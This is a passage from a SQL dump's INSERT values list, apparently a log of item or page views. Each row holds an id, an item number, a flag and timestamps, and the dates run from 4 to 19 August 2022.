20:00:06'),(56142,4827,1,'2022-08-04','2022-08-04 20:07:57'),(56143,4827,1,'2022-08-04','2022-08-04 20:08:12'),(56144,74,1,'2022-08-04','2022-08-04 20:08:57'),(56145,2503,1,'2022-08-04','2022-08-04 20:09:22'),(56146,74,1,'2022-08-04','2022-08-04 20:12:55'),(56147,4827,1,'2022-08-04','2022-08-04 20:13:01'),(56148,4827,1,'2022-08-04','2022-08-04 20:14:40'),(56149,4827,1,'2022-08-04','2022-08-04 20:18:41'),(56150,4830,1,'2022-08-04','2022-08-04 20:21:07'),(56151,4845,1,'2022-08-04','2022-08-04 20:24:58'),(56152,1596,1,'2022-08-04','2022-08-04 20:28:45'),(56153,4845,1,'2022-08-04','2022-08-04 20:29:20'),(56154,4840,1,'2022-08-04','2022-08-04 20:50:57'),(56155,4827,1,'2022-08-04','2022-08-04 21:06:46'),(56156,1602,1,'2022-08-04','2022-08-04 21:13:26'),(56157,3664,1,'2022-08-04','2022-08-04 21:26:47'),(56158,4420,1,'2022-08-04','2022-08-04 21:55:40'),(56159,4827,1,'2022-08-04','2022-08-04 22:01:22'),(56160,4842,1,'2022-08-04','2022-08-04 22:30:04'),(56161,4842,1,'2022-08-04','2022-08-04 22:31:33'),(56162,1741,1,'2022-08-04','2022-08-04 22:56:43'),(56163,1726,1,'2022-08-04','2022-08-04 22:56:51'),(56164,4842,1,'2022-08-04','2022-08-04 23:08:25'),(56165,4830,1,'2022-08-04','2022-08-04 23:18:22'),(56166,4827,1,'2022-08-04','2022-08-04 23:24:21'),(56167,4842,1,'2022-08-04','2022-08-04 23:27:23'),(56168,4830,1,'2022-08-04','2022-08-04 23:30:32'),(56169,2904,1,'2022-08-04','2022-08-04 23:32:08'),(56170,102,1,'2022-08-04','2022-08-04 23:33:02'),(56171,2904,1,'2022-08-04','2022-08-04 23:33:24'),(56172,2904,1,'2022-08-04','2022-08-04 23:34:47'),(56173,3063,1,'2022-08-04','2022-08-04 23:41:39'),(56174,3117,1,'2022-08-05','2022-08-05 00:26:39'),(56175,4832,1,'2022-08-05','2022-08-05 02:49:09'),(56176,4420,1,'2022-08-05','2022-08-05 02:54:28'),(56177,4832,1,'2022-08-05','2022-08-05 02:56:36'),(56178,3764,1,'2022-08-05','2022-08-05 03:26:39'),(56179,4326,1,'2022-08-05','2022-08-05 05:46:08'),(56180,1594,1,'2022-08-05','2022-08-05 05:52:41'),(56181,1586,1,'2022-08-05','2022-08-05 06:51:12'),(56182,4845,1,'2022-08-05','2022-08-05 06:59:42'),(56183,4842,1,'2022-08-05','2022-08-05 07:01:02'),(56184,4840,1,'2022-08-05','2022-08-05 07:01:45'),(56185,4420,1,'2022-08-05','2022-08-05 07:27:02'),(56186,4779,1,'2022-08-05','2022-08-05 07:49:48'),(56187,3664,1,'2022-08-05','2022-08-05 08:16:54'),(56188,4845,1,'2022-08-05','2022-08-05 08:29:15'),(56189,472,1,'2022-08-05','2022-08-05 08:29:57'),(56190,4830,1,'2022-08-05','2022-08-05 08:31:44'),(56191,2993,1,'2022-08-05','2022-08-05 09:01:57'),(56192,1594,1,'2022-08-05','2022-08-05 09:08:10'),(56193,1594,1,'2022-08-05','2022-08-05 09:08:15'),(56194,4845,1,'2022-08-05','2022-08-05 09:18:48'),(56195,2813,1,'2022-08-05','2022-08-05 10:12:52'),(56196,3781,1,'2022-08-05','2022-08-05 10:57:51'),(56197,4827,1,'2022-08-05','2022-08-05 11:15:19'),(56198,1590,1,'2022-08-05','2022-08-05 11:16:53'),(56199,4835,1,'2022-08-05','2022-08-05 11:20:05'),(56200,4827,1,'2022-08-05','2022-08-05 11:20:26'),(56201,4827,1,'2022-08-05','2022-08-05 11:20:31'),(56202,1711,1,'2022-08-05','2022-08-05 11:20:37'),(56203,4835,1,'2022-08-05','2022-08-05 11:41:45'),(56204,2617,1,'2022-08-05','2022-08-05 11:42:50'),(56205,4827,1,'2022-08-05','2022-08-05 11:56:21'),(56206,4845,1,'2022-08-05','2022-08-05 11:58:26'),(56207,4845,1,'2022-08-05','2022-08-05 12:07:23'),(56208,4827,1,'2022-08-05','2022-08-05 12:09:51'),(56209,4827,1,'2022-08-05','2022-08-05 12:11:45'),(56210,4420,1,'2022-08-05','2022-08-05 12:12:27'),(56211,1610,1,'2022-08-05','2022-08-05 12:51:18'),(56212,4830,1,'2022-08-05','2022-08-05 12:52:44'),(56213,4837,1,'2022-08-05','2022-08-05 13:27:04'),(56214,4842,1,'2022-08-05','2022-08-05 13:28:28'),(56215,4842,1,'2022-08-05','2022-08-05 13:31:04'),(56216,4842,1,'2022-08-05','2022-08-05 13:38:25'),(56217,4842,1,'2022-08-05','2022-08-05 13:42:43'),(56218,1614,1,'2022-08-05','2022-08-05 13:53:35'),(56219,4845,1,'2022-08-05','2022-08-05 14:06:04'),(56220,4842,1,'2022-08-05','2022-08-05 14:07:35'),(56221,4842,1,'2022-08-05','2022-08-05 14:08:29'),(56222,2904,1,'2022-08-05','2022-08-05 14:08:41'),(56223,4842,1,'2022-08-05','2022-08-05 14:35:19'),(56224,4842,1,'2022-08-05','2022-08-05 14:41:08'),(56225,4416,1,'2022-08-05','2022-08-05 15:04:03'),(56226,4827,1,'2022-08-05','2022-08-05 15:18:17'),(56227,4326,1,'2022-08-05','2022-08-05 15:57:11'),(56228,4845,1,'2022-08-05','2022-08-05 16:21:47'),(56229,4845,1,'2022-08-05','2022-08-05 16:39:28'),(56230,1596,1,'2022-08-05','2022-08-05 17:19:28'),(56231,1596,1,'2022-08-05','2022-08-05 17:24:34'),(56232,76,1,'2022-08-05','2022-08-05 17:26:32'),(56233,4416,1,'2022-08-05','2022-08-05 17:27:17'),(56234,1596,1,'2022-08-05','2022-08-05 17:49:53'),(56235,2813,1,'2022-08-05','2022-08-05 18:05:17'),(56236,1596,1,'2022-08-05','2022-08-05 18:12:46'),(56237,4840,1,'2022-08-05','2022-08-05 18:27:24'),(56238,4827,1,'2022-08-05','2022-08-05 18:40:21'),(56239,4845,1,'2022-08-05','2022-08-05 18:50:24'),(56240,1608,1,'2022-08-05','2022-08-05 18:57:16'),(56241,4691,1,'2022-08-05','2022-08-05 20:13:14'),(56242,4416,1,'2022-08-05','2022-08-05 20:25:01'),(56243,4837,1,'2022-08-05','2022-08-05 20:43:00'),(56244,3781,1,'2022-08-05','2022-08-05 20:53:13'),(56245,4827,1,'2022-08-05','2022-08-05 21:05:03'),(56246,4827,1,'2022-08-05','2022-08-05 21:08:18'),(56247,4706,1,'2022-08-05','2022-08-05 21:12:10'),(56248,4827,1,'2022-08-05','2022-08-05 21:12:28'),(56249,4765,1,'2022-08-05','2022-08-05 21:23:16'),(56250,4827,1,'2022-08-05','2022-08-05 21:30:28'),(56251,4827,1,'2022-08-05','2022-08-05 21:35:20'),(56252,3066,1,'2022-08-05','2022-08-05 21:38:22'),(56253,3083,1,'2022-08-05','2022-08-05 21:51:12'),(56254,3489,1,'2022-08-05','2022-08-05 21:53:14'),(56255,4759,1,'2022-08-05','2022-08-05 22:00:16'),(56256,4335,1,'2022-08-05','2022-08-05 22:36:55'),(56257,4759,1,'2022-08-05','2022-08-05 22:45:19'),(56258,4335,1,'2022-08-05','2022-08-05 23:02:29'),(56259,91,1,'2022-08-06','2022-08-06 02:23:19'),(56260,80,1,'2022-08-06','2022-08-06 02:56:50'),(56261,87,1,'2022-08-06','2022-08-06 03:27:56'),(56262,3060,1,'2022-08-06','2022-08-06 04:07:07'),(56263,2410,1,'2022-08-06','2022-08-06 04:26:44'),(56264,1703,1,'2022-08-06','2022-08-06 05:32:37'),(56265,4827,1,'2022-08-06','2022-08-06 05:36:12'),(56266,4827,1,'2022-08-06','2022-08-06 05:38:07'),(56267,2410,1,'2022-08-06','2022-08-06 05:56:42'),(56268,4797,1,'2022-08-06','2022-08-06 06:49:14'),(56269,4827,1,'2022-08-06','2022-08-06 08:02:11'),(56270,4612,1,'2022-08-06','2022-08-06 08:38:27'),(56271,3531,1,'2022-08-06','2022-08-06 10:13:18'),(56272,1602,1,'2022-08-06','2022-08-06 10:45:46'),(56273,1606,1,'2022-08-06','2022-08-06 11:34:04'),(56274,4827,1,'2022-08-06','2022-08-06 11:35:50'),(56275,1544,1,'2022-08-06','2022-08-06 11:49:53'),(56276,4845,1,'2022-08-06','2022-08-06 12:20:26'),(56277,1600,1,'2022-08-06','2022-08-06 12:26:39'),(56278,4845,1,'2022-08-06','2022-08-06 12:28:52'),(56279,4845,1,'2022-08-06','2022-08-06 13:02:22'),(56280,4827,1,'2022-08-06','2022-08-06 13:03:49'),(56281,4837,1,'2022-08-06','2022-08-06 13:51:20'),(56282,4837,1,'2022-08-06','2022-08-06 13:52:28'),(56283,3781,1,'2022-08-06','2022-08-06 14:23:10'),(56284,4400,1,'2022-08-06','2022-08-06 14:28:09'),(56285,4837,1,'2022-08-06','2022-08-06 14:36:20'),(56286,4837,1,'2022-08-06','2022-08-06 14:38:12'),(56287,4845,1,'2022-08-06','2022-08-06 14:38:14'),(56288,4840,1,'2022-08-06','2022-08-06 14:39:36'),(56289,4412,1,'2022-08-06','2022-08-06 14:50:05'),(56290,1724,1,'2022-08-06','2022-08-06 14:51:10'),(56291,3083,1,'2022-08-06','2022-08-06 15:14:12'),(56292,4412,1,'2022-08-06','2022-08-06 15:48:00'),(56293,4845,1,'2022-08-06','2022-08-06 15:57:06'),(56294,4845,1,'2022-08-06','2022-08-06 15:58:48'),(56295,4845,1,'2022-08-06','2022-08-06 16:00:20'),(56296,4845,1,'2022-08-06','2022-08-06 16:03:21'),(56297,1586,1,'2022-08-06','2022-08-06 16:10:44'),(56298,4827,1,'2022-08-06','2022-08-06 16:20:31'),(56299,1728,1,'2022-08-06','2022-08-06 16:27:39'),(56300,4412,1,'2022-08-06','2022-08-06 16:32:54'),(56301,3664,1,'2022-08-06','2022-08-06 16:55:41'),(56302,3781,1,'2022-08-06','2022-08-06 17:05:13'),(56303,1697,1,'2022-08-06','2022-08-06 18:12:06'),(56304,3027,1,'2022-08-06','2022-08-06 18:33:13'),(56305,4802,1,'2022-08-06','2022-08-06 18:55:50'),(56306,4412,1,'2022-08-06','2022-08-06 18:59:04'),(56307,4520,1,'2022-08-06','2022-08-06 19:18:13'),(56308,4412,1,'2022-08-06','2022-08-06 19:21:40'),(56309,1602,1,'2022-08-06','2022-08-06 19:32:28'),(56310,1743,1,'2022-08-06','2022-08-06 19:53:50'),(56311,1872,1,'2022-08-06','2022-08-06 20:09:42'),(56312,4837,1,'2022-08-06','2022-08-06 21:22:12'),(56313,4837,1,'2022-08-06','2022-08-06 21:26:47'),(56314,4329,1,'2022-08-06','2022-08-06 21:47:32'),(56315,1877,1,'2022-08-06','2022-08-06 22:21:17'),(56316,3030,1,'2022-08-06','2022-08-06 23:25:02'),(56317,3664,1,'2022-08-07','2022-08-07 00:16:44'),(56318,4520,1,'2022-08-07','2022-08-07 01:02:08'),(56319,4457,1,'2022-08-07','2022-08-07 02:11:17'),(56320,4639,1,'2022-08-07','2022-08-07 02:13:46'),(56321,16,1,'2022-08-07','2022-08-07 02:44:32'),(56322,2809,1,'2022-08-07','2022-08-07 03:43:46'),(56323,3297,1,'2022-08-07','2022-08-07 04:28:49'),(56324,3307,1,'2022-08-07','2022-08-07 05:13:50'),(56325,4566,1,'2022-08-07','2022-08-07 05:58:45'),(56326,3027,1,'2022-08-07','2022-08-07 06:28:37'),(56327,4771,1,'2022-08-07','2022-08-07 06:36:28'),(56328,3102,1,'2022-08-07','2022-08-07 08:12:02'),(56329,1590,1,'2022-08-07','2022-08-07 10:54:16'),(56330,4404,1,'2022-08-07','2022-08-07 11:39:19'),(56331,3486,1,'2022-08-07','2022-08-07 11:43:46'),(56332,3297,1,'2022-08-07','2022-08-07 12:13:45'),(56333,3261,1,'2022-08-07','2022-08-07 12:24:24'),(56334,4663,1,'2022-08-07','2022-08-07 13:43:47'),(56335,3083,1,'2022-08-07','2022-08-07 13:48:55'),(56336,89,1,'2022-08-07','2022-08-07 13:49:13'),(56337,74,1,'2022-08-07','2022-08-07 13:49:55'),(56338,2503,1,'2022-08-07','2022-08-07 13:50:08'),(56339,68,1,'2022-08-07','2022-08-07 13:50:53'),(56340,2503,1,'2022-08-07','2022-08-07 13:51:03'),(56341,89,1,'2022-08-07','2022-08-07 13:51:09'),(56342,3083,1,'2022-08-07','2022-08-07 13:51:26'),(56343,4842,1,'2022-08-07','2022-08-07 13:58:56'),(56344,4845,1,'2022-08-07','2022-08-07 14:00:05'),(56345,4845,1,'2022-08-07','2022-08-07 14:01:20'),(56346,4845,1,'2022-08-07','2022-08-07 14:05:12'),(56347,2904,1,'2022-08-07','2022-08-07 14:06:34'),(56348,4845,1,'2022-08-07','2022-08-07 14:06:46'),(56349,1594,1,'2022-08-07','2022-08-07 14:40:05'),(56350,4691,1,'2022-08-07','2022-08-07 14:51:09'),(56351,2813,1,'2022-08-07','2022-08-07 15:13:42'),(56352,3253,1,'2022-08-07','2022-08-07 15:37:23'),(56353,3006,1,'2022-08-07','2022-08-07 15:58:39'),(56354,4520,1,'2022-08-07','2022-08-07 17:54:29'),(56355,2297,1,'2022-08-07','2022-08-07 18:32:42'),(56356,1608,1,'2022-08-07','2022-08-07 19:52:31'),(56357,1608,1,'2022-08-07','2022-08-07 21:22:27'),(56358,2148,1,'2022-08-07','2022-08-07 22:17:31'),(56359,4840,1,'2022-08-07','2022-08-07 22:56:41'),(56360,4765,1,'2022-08-07','2022-08-07 23:02:32'),(56361,4845,1,'2022-08-07','2022-08-07 23:30:30'),(56362,4832,1,'2022-08-07','2022-08-07 23:33:02'),(56363,4691,1,'2022-08-08','2022-08-08 00:28:23'),(56364,4837,1,'2022-08-08','2022-08-08 00:30:12'),(56365,2769,1,'2022-08-08','2022-08-08 00:32:32'),(56366,2904,1,'2022-08-08','2022-08-08 01:00:41'),(56367,2904,1,'2022-08-08','2022-08-08 01:03:19'),(56368,4412,1,'2022-08-08','2022-08-08 01:34:41'),(56369,1724,1,'2022-08-08','2022-08-08 01:38:10'),(56370,2813,1,'2022-08-08','2022-08-08 01:58:26'),(56371,3290,1,'2022-08-08','2022-08-08 02:02:29'),(56372,2609,1,'2022-08-08','2022-08-08 04:40:14'),(56373,2609,1,'2022-08-08','2022-08-08 04:41:29'),(56374,2609,1,'2022-08-08','2022-08-08 04:43:31'),(56375,1877,1,'2022-08-08','2022-08-08 05:03:13'),(56376,1608,1,'2022-08-08','2022-08-08 06:11:36'),(56377,3313,1,'2022-08-08','2022-08-08 07:18:53'),(56378,4765,1,'2022-08-08','2022-08-08 08:03:52'),(56379,4827,1,'2022-08-08','2022-08-08 08:41:43'),(56380,4845,1,'2022-08-08','2022-08-08 09:21:59'),(56381,4845,1,'2022-08-08','2022-08-08 09:23:16'),(56382,4842,1,'2022-08-08','2022-08-08 09:23:57'),(56383,1594,1,'2022-08-08','2022-08-08 09:25:03'),(56384,1614,1,'2022-08-08','2022-08-08 09:38:35'),(56385,1594,1,'2022-08-08','2022-08-08 09:57:31'),(56386,3079,1,'2022-08-08','2022-08-08 10:25:50'),(56387,4444,1,'2022-08-08','2022-08-08 10:57:34'),(56388,4842,1,'2022-08-08','2022-08-08 11:31:03'),(56389,1602,1,'2022-08-08','2022-08-08 11:34:20'),(56390,1612,1,'2022-08-08','2022-08-08 11:53:30'),(56391,3664,1,'2022-08-08','2022-08-08 11:57:03'),(56392,68,1,'2022-08-08','2022-08-08 11:58:33'),(56393,80,1,'2022-08-08','2022-08-08 11:59:06'),(56394,1602,1,'2022-08-08','2022-08-08 12:01:25'),(56395,4832,1,'2022-08-08','2022-08-08 12:01:40'),(56396,68,1,'2022-08-08','2022-08-08 12:39:32'),(56397,3664,1,'2022-08-08','2022-08-08 12:39:35'),(56398,68,1,'2022-08-08','2022-08-08 12:39:40'),(56399,80,1,'2022-08-08','2022-08-08 12:39:41'),(56400,4827,1,'2022-08-08','2022-08-08 13:13:36'),(56401,4827,1,'2022-08-08','2022-08-08 13:21:53'),(56402,4827,1,'2022-08-08','2022-08-08 13:34:21'),(56403,4827,1,'2022-08-08','2022-08-08 13:35:19'),(56404,4827,1,'2022-08-08','2022-08-08 13:35:27'),(56405,4827,1,'2022-08-08','2022-08-08 13:37:13'),(56406,4827,1,'2022-08-08','2022-08-08 13:37:24'),(56407,4827,1,'2022-08-08','2022-08-08 13:44:05'),(56408,4412,1,'2022-08-08','2022-08-08 13:48:14'),(56409,4827,1,'2022-08-08','2022-08-08 14:00:31'),(56410,4845,1,'2022-08-08','2022-08-08 14:01:10'),(56411,570,1,'2022-08-08','2022-08-08 14:06:34'),(56412,4412,1,'2022-08-08','2022-08-08 14:07:32'),(56413,4412,1,'2022-08-08','2022-08-08 14:08:03'),(56414,4412,1,'2022-08-08','2022-08-08 14:08:32'),(56415,1544,1,'2022-08-08','2022-08-08 14:13:11'),(56416,4827,1,'2022-08-08','2022-08-08 14:13:58'),(56417,4827,1,'2022-08-08','2022-08-08 14:14:53'),(56418,4827,1,'2022-08-08','2022-08-08 14:18:26'),(56419,4827,1,'2022-08-08','2022-08-08 14:38:44'),(56420,4827,1,'2022-08-08','2022-08-08 14:51:40'),(56421,4827,1,'2022-08-08','2022-08-08 14:59:30'),(56422,4827,1,'2022-08-08','2022-08-08 14:59:38'),(56423,4827,1,'2022-08-08','2022-08-08 15:02:11'),(56424,4827,1,'2022-08-08','2022-08-08 15:05:41'),(56425,4827,1,'2022-08-08','2022-08-08 15:05:46'),(56426,4827,1,'2022-08-08','2022-08-08 15:06:26'),(56427,4827,1,'2022-08-08','2022-08-08 15:06:36'),(56428,4827,1,'2022-08-08','2022-08-08 15:09:38'),(56429,4827,1,'2022-08-08','2022-08-08 15:12:15'),(56430,4827,1,'2022-08-08','2022-08-08 15:12:23'),(56431,4827,1,'2022-08-08','2022-08-08 15:13:10'),(56432,4827,1,'2022-08-08','2022-08-08 15:13:40'),(56433,4827,1,'2022-08-08','2022-08-08 15:25:26'),(56434,4827,1,'2022-08-08','2022-08-08 15:26:46'),(56435,3781,1,'2022-08-08','2022-08-08 15:31:09'),(56436,4827,1,'2022-08-08','2022-08-08 15:33:22'),(56437,1602,1,'2022-08-08','2022-08-08 15:55:40'),(56438,4832,1,'2022-08-08','2022-08-08 17:19:00'),(56439,2751,1,'2022-08-08','2022-08-08 17:20:50'),(56440,2904,1,'2022-08-08','2022-08-08 17:48:32'),(56441,2769,1,'2022-08-08','2022-08-08 17:59:58'),(56442,2248,1,'2022-08-08','2022-08-08 18:02:18'),(56443,4428,1,'2022-08-08','2022-08-08 18:02:21'),(56444,3664,1,'2022-08-08','2022-08-08 18:02:23'),(56445,1608,1,'2022-08-08','2022-08-08 18:05:55'),(56446,1596,1,'2022-08-08','2022-08-08 18:13:33'),(56447,3313,1,'2022-08-08','2022-08-08 18:13:33'),(56448,3102,1,'2022-08-08','2022-08-08 18:24:49'),(56449,1722,1,'2022-08-08','2022-08-08 19:13:19'),(56450,1718,1,'2022-08-08','2022-08-08 19:58:19'),(56451,4827,1,'2022-08-08','2022-08-08 21:19:10'),(56452,4697,1,'2022-08-08','2022-08-08 21:28:21'),(56453,4845,1,'2022-08-08','2022-08-08 21:59:34'),(56454,2904,1,'2022-08-08','2022-08-08 22:02:31'),(56455,4845,1,'2022-08-08','2022-08-08 22:02:47'),(56456,3109,1,'2022-08-09','2022-08-09 02:00:39'),(56457,3664,1,'2022-08-09','2022-08-09 02:03:20'),(56458,4832,1,'2022-08-09','2022-08-09 02:50:00'),(56459,74,1,'2022-08-09','2022-08-09 02:51:40'),(56460,1608,1,'2022-08-09','2022-08-09 03:57:21'),(56461,4238,1,'2022-08-09','2022-08-09 04:42:19'),(56462,4428,1,'2022-08-09','2022-08-09 05:27:20'),(56463,4837,1,'2022-08-09','2022-08-09 05:40:08'),(56464,4416,1,'2022-08-09','2022-08-09 06:27:27'),(56465,3752,1,'2022-08-09','2022-08-09 06:57:18'),(56466,4845,1,'2022-08-09','2022-08-09 07:24:57'),(56467,4845,1,'2022-08-09','2022-08-09 07:24:58'),(56468,4845,1,'2022-08-09','2022-08-09 07:25:02'),(56469,4845,1,'2022-08-09','2022-08-09 07:25:04'),(56470,4845,1,'2022-08-09','2022-08-09 07:40:25'),(56471,4845,1,'2022-08-09','2022-08-09 07:50:49'),(56472,1724,1,'2022-08-09','2022-08-09 10:23:15'),(56473,1724,1,'2022-08-09','2022-08-09 10:31:20'),(56474,1724,1,'2022-08-09','2022-08-09 10:31:45'),(56475,1544,1,'2022-08-09','2022-08-09 11:03:34'),(56476,1544,1,'2022-08-09','2022-08-09 11:03:40'),(56477,4842,1,'2022-08-09','2022-08-09 11:49:25'),(56478,4576,1,'2022-08-09','2022-08-09 11:53:24'),(56479,1596,1,'2022-08-09','2022-08-09 13:41:05'),(56480,80,1,'2022-08-09','2022-08-09 13:41:16'),(56481,1596,1,'2022-08-09','2022-08-09 13:43:15'),(56482,4404,1,'2022-08-09','2022-08-09 13:44:18'),(56483,1608,1,'2022-08-09','2022-08-09 14:34:18'),(56484,1596,1,'2022-08-09','2022-08-09 14:34:20'),(56485,3534,1,'2022-08-09','2022-08-09 14:40:31'),(56486,4830,1,'2022-08-09','2022-08-09 14:43:33'),(56487,4830,1,'2022-08-09','2022-08-09 14:45:59'),(56488,91,1,'2022-08-09','2022-08-09 14:46:33'),(56489,335,1,'2022-08-09','2022-08-09 14:48:41'),(56490,1600,1,'2022-08-09','2022-08-09 15:00:07'),(56491,1590,1,'2022-08-09','2022-08-09 15:14:11'),(56492,4428,1,'2022-08-09','2022-08-09 15:19:17'),(56493,4835,1,'2022-08-09','2022-08-09 15:21:45'),(56494,4835,1,'2022-08-09','2022-08-09 15:22:39'),(56495,4835,1,'2022-08-09','2022-08-09 15:23:25'),(56496,4709,1,'2022-08-09','2022-08-09 15:27:18'),(56497,4845,1,'2022-08-09','2022-08-09 15:33:41'),(56498,2904,1,'2022-08-09','2022-08-09 15:34:17'),(56499,4776,1,'2022-08-09','2022-08-09 15:40:45'),(56500,3764,1,'2022-08-09','2022-08-09 15:57:22'),(56501,4842,1,'2022-08-09','2022-08-09 16:59:30'),(56502,4842,1,'2022-08-09','2022-08-09 17:10:56'),(56503,4845,1,'2022-08-09','2022-08-09 17:18:10'),(56504,4845,1,'2022-08-09','2022-08-09 17:21:08'),(56505,4845,1,'2022-08-09','2022-08-09 17:22:00'),(56506,472,1,'2022-08-09','2022-08-09 17:27:19'),(56507,4412,1,'2022-08-09','2022-08-09 20:55:58'),(56508,4771,1,'2022-08-09','2022-08-09 21:53:32'),(56509,3664,1,'2022-08-09','2022-08-09 22:12:36'),(56510,1612,1,'2022-08-09','2022-08-09 23:04:58'),(56511,2911,1,'2022-08-09','2022-08-09 23:12:35'),(56512,4416,1,'2022-08-09','2022-08-09 23:36:40'),(56513,4827,1,'2022-08-10','2022-08-10 01:28:41'),(56514,4416,1,'2022-08-10','2022-08-10 02:12:49'),(56515,472,1,'2022-08-10','2022-08-10 03:01:39'),(56516,3263,1,'2022-08-10','2022-08-10 04:19:46'),(56517,1778,1,'2022-08-10','2022-08-10 04:42:20'),(56518,1602,1,'2022-08-10','2022-08-10 05:39:07'),(56519,2801,1,'2022-08-10','2022-08-10 06:01:38'),(56520,3056,1,'2022-08-10','2022-08-10 06:28:35'),(56521,1602,1,'2022-08-10','2022-08-10 07:07:04'),(56522,87,1,'2022-08-10','2022-08-10 07:28:10'),(56523,1602,1,'2022-08-10','2022-08-10 08:16:38'),(56524,87,1,'2022-08-10','2022-08-10 08:30:56'),(56525,476,1,'2022-08-10','2022-08-10 08:31:20'),(56526,87,1,'2022-08-10','2022-08-10 08:31:40'),(56527,74,1,'2022-08-10','2022-08-10 08:33:19'),(56528,4556,1,'2022-08-10','2022-08-10 09:47:13'),(56529,1612,1,'2022-08-10','2022-08-10 10:15:19'),(56530,472,1,'2022-08-10','2022-08-10 11:16:37'),(56531,4837,1,'2022-08-10','2022-08-10 11:20:18'),(56532,2809,1,'2022-08-10','2022-08-10 11:23:18'),(56533,80,1,'2022-08-10','2022-08-10 11:34:39'),(56534,4651,1,'2022-08-10','2022-08-10 12:08:17'),(56535,2775,1,'2022-08-10','2022-08-10 12:47:05'),(56536,1596,1,'2022-08-10','2022-08-10 12:48:33'),(56537,1594,1,'2022-08-10','2022-08-10 12:49:25'),(56538,1594,1,'2022-08-10','2022-08-10 12:53:09'),(56539,1602,1,'2022-08-10','2022-08-10 13:31:38'),(56540,3030,1,'2022-08-10','2022-08-10 14:12:40'),(56541,91,1,'2022-08-10','2022-08-10 15:25:54'),(56542,4412,1,'2022-08-10','2022-08-10 15:42:56'),(56543,4412,1,'2022-08-10','2022-08-10 15:52:28'),(56544,91,1,'2022-08-10','2022-08-10 16:06:51'),(56545,4874,1,'2022-08-10','2022-08-10 16:07:05'),(56546,4874,1,'2022-08-10','2022-08-10 16:10:36'),(56547,4832,1,'2022-08-10','2022-08-10 17:14:56'),(56548,4845,1,'2022-08-10','2022-08-10 18:09:32'),(56549,4776,1,'2022-08-10','2022-08-10 18:11:58'),(56550,4842,1,'2022-08-10','2022-08-10 18:41:14'),(56551,4842,1,'2022-08-10','2022-08-10 18:52:46'),(56552,4668,1,'2022-08-10','2022-08-10 19:41:45'),(56553,4830,1,'2022-08-10','2022-08-10 19:42:01'),(56554,472,1,'2022-08-10','2022-08-10 19:59:53'),(56555,2410,1,'2022-08-10','2022-08-10 20:12:00'),(56556,89,1,'2022-08-10','2022-08-10 20:29:56'),(56557,3498,1,'2022-08-10','2022-08-10 20:44:54'),(56558,2154,1,'2022-08-10','2022-08-10 20:59:54'),(56559,1604,1,'2022-08-10','2022-08-10 21:08:04'),(56560,4685,1,'2022-08-10','2022-08-10 21:11:44'),(56561,4842,1,'2022-08-10','2022-08-10 21:19:37'),(56562,4387,1,'2022-08-10','2022-08-10 21:31:37'),(56563,1870,1,'2022-08-10','2022-08-10 21:55:17'),(56564,1582,1,'2022-08-10','2022-08-10 21:56:28'),(56565,3724,1,'2022-08-10','2022-08-10 22:01:36'),(56566,4835,1,'2022-08-10','2022-08-10 22:10:20'),(56567,4738,1,'2022-08-10','2022-08-10 23:12:54'),(56568,3030,1,'2022-08-10','2022-08-10 23:38:50'),(56569,4840,1,'2022-08-11','2022-08-11 02:07:25'),(56570,4387,1,'2022-08-11','2022-08-11 05:50:32'),(56571,4837,1,'2022-08-11','2022-08-11 05:54:34'),(56572,1598,1,'2022-08-11','2022-08-11 06:01:52'),(56573,4561,1,'2022-08-11','2022-08-11 06:36:28'),(56574,4335,1,'2022-08-11','2022-08-11 06:58:01'),(56575,1544,1,'2022-08-11','2022-08-11 07:14:18'),(56576,3534,1,'2022-08-11','2022-08-11 07:42:59'),(56577,80,1,'2022-08-11','2022-08-11 08:25:31'),(56578,68,1,'2022-08-11','2022-08-11 08:27:43'),(56579,2395,1,'2022-08-11','2022-08-11 08:31:32'),(56580,1602,1,'2022-08-11','2022-08-11 09:05:02'),(56581,2152,1,'2022-08-11','2022-08-11 09:12:59'),(56582,74,1,'2022-08-11','2022-08-11 09:20:16'),(56583,80,1,'2022-08-11','2022-08-11 09:20:38'),(56584,108,1,'2022-08-11','2022-08-11 09:23:24'),(56585,80,1,'2022-08-11','2022-08-11 09:23:39'),(56586,80,1,'2022-08-11','2022-08-11 09:25:09'),(56587,80,1,'2022-08-11','2022-08-11 09:25:33'),(56588,74,1,'2022-08-11','2022-08-11 09:25:39'),(56589,80,1,'2022-08-11','2022-08-11 10:37:48'),(56590,4830,1,'2022-08-11','2022-08-11 10:46:44'),(56591,4412,1,'2022-08-11','2022-08-11 11:10:37'),(56592,76,1,'2022-08-11','2022-08-11 11:11:28'),(56593,3706,1,'2022-08-11','2022-08-11 11:44:58'),(56594,1772,1,'2022-08-11','2022-08-11 12:02:03'),(56595,91,1,'2022-08-11','2022-08-11 12:02:47'),(56596,4412,1,'2022-08-11','2022-08-11 12:11:46'),(56597,4827,1,'2022-08-11','2022-08-11 13:50:10'),(56598,4845,1,'2022-08-11','2022-08-11 13:58:47'),(56599,72,1,'2022-08-11','2022-08-11 15:26:16'),(56600,4845,1,'2022-08-11','2022-08-11 15:26:27'),(56601,89,1,'2022-08-19','2022-08-19 14:52:08'),(56602,84,1,'2022-08-19','2022-08-19 14:52:18'),(56603,4842,1,'2022-08-19','2022-08-19 14:54:18'),(56604,84,1,'2022-08-19','2022-08-19 14:54:52'),(56605,89,1,'2022-08-19','2022-08-19 14:57:41'),(56606,1544,1,'2022-08-19','2022-08-19 14:57:47'),(56607,4911,1,'2022-08-19','2022-08-19 15:12:12'),(56608,3800,1,'2022-08-19','2022-08-19 15:14:41'),(56609,3805,1,'2022-08-19','2022-08-19 15:15:01'),(56610,3834,1,'2022-08-19','2022-08-19 15:15:21'),(56611,3877,1,'2022-08-19','2022-08-19 15:15:41'),(56612,3901,1,'2022-08-19','2022-08-19 15:15:59'),(56613,4911,1,'2022-08-19','2022-08-19 15:35:25'),(56614,4845,1,'2022-08-19','2022-08-19 15:45:30'),(56615,89,1,'2022-08-19','2022-08-19 15:49:41'),(56616,1590,1,'2022-08-19','2022-08-19 15:49:51'),(56617,89,1,'2022-08-19','2022-08-19 15:49:54'),(56618,1544,1,'2022-08-19','2022-08-19 15:50:00'),(56619,89,1,'2022-08-19','2022-08-19 15:50:05'),(56620,1592,1,'2022-08-19','2022-08-19 15:50:21'),(56621,3901,1,'2022-08-19','2022-08-19 15:51:32'),(56622,89,1,'2022-08-19','2022-08-19 15:54:50'),(56623,4930,1,'2022-08-19','2022-08-19 15:58:46'),(56624,3090,1,'2022-08-19','2022-08-19 16:11:33'),(56625,4448,1,'2022-08-19','2022-08-19 17:58:44'),(56626,1594,1,'2022-08-19','2022-08-19 